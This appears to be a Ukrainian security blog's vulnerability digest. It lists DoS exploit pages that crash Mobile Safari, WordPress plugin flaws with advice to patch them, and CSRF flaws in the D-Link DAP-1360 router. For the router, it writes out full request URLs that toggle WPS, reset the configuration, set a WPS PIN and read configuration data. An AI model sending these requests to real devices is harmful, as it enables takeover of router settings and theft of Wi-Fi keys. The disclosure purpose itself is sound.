Добірка уразливостей
17:21 16.03.2016В даній добірці уразливості в веб додатках:
В даній добірці уразливості в веб додатках:
В середині грудня я провів перевірку всіх своїх експлоітів для браузерів з 2006 року, що я оприлюднив на сайті (та деяких не оприлюднених експлоітів). І виявив численні Denial of Service уразливості в Mobile Safari 6.0.1 та 8.4.1 для iOS.
Раніше я писав про Denial of Service та Cross-Site Scripting уразливості в Mobile Safari. Це друга частина уразливостей.
Denial of Service (WASC-10):
Вибивання браузера чи зависання (з подальшим вибиванням).
IE DoS Exploit5.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.
Mozilla, IE, Chrome & Opera DoS.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 70% CPU.
Mozilla, Opera & Chrome DoS Exploit.html - в 6.0.1.
Opera DoS Exploit (freeze).html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.
Opera DoS Exploit.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.
Opera DoS Exploit3.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.
Opera DoS Exploit4.html - в 6.0.1, а в 8.4.1 без вибивання, лише споживання 60% CPU.
Наступні атаки призводять до блокування всього браузера (потрібно по хитрому розблоковувати чи повністю перезапускати):
Firefox & IE & Chrome DoS Exploit.html
Firefox & IE & Chrome DoS Exploit2.html
Firefox & IE & Chrome DoS Exploit3.txt
Уразливі Mobile Safari 6.0.1, 8.4.1 та попередні версії для iOS.
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах MP3-Jplayer, InBoundio Marketing, Foxypress, W3 Total Cache та в версіях WordPress до 1.5.1.3. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах WPML, Reflex Gallery, Yoast Google Analytics, Ajax Search Pro, AB Google Map Travel. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Pie Register, Huge IT Slider, WPML, Yoast SEO і темі Fraction. Для котрих з’явилися експлоіти.
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
В даній добірці уразливості в веб додатках:
Продовжуючи тему уразливостей в D-Link DAP-1360. У квітні, 30.04.2014, я виявив Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).
CSRF (WASC-09):
В розділі Wi-Fi - WPS можна змінити параметр WPS Enable:
Увімкнути:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:true}}
Вимкнути:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:false,%22WscConfigured%22:true}}
Можна відмінити конфігурацію (Reset to unconfigured):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=106&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscConfigured%22:false}}
Можна прочитати дані про конфігурацію в Information - Refresh. Через XSS атаку з цієї сторінки можна отримати дані про ключ Encryption key (це спрацює навіть при вимкненому WPS):
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_config_action=1&res_config_id=35&res_struct_size=0
Можна змінити метод в Connection - WPS Method:
PBC:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PBC%22}}
PIN:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=107&res_struct_size=0&res_buf={%22wps%22:{%22WscEnable%22:true,%22WscMethod%22:%22PIN%22,%22WscPin%22:%2211111111%22}}
Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.
В даній добірці уразливості в веб додатках: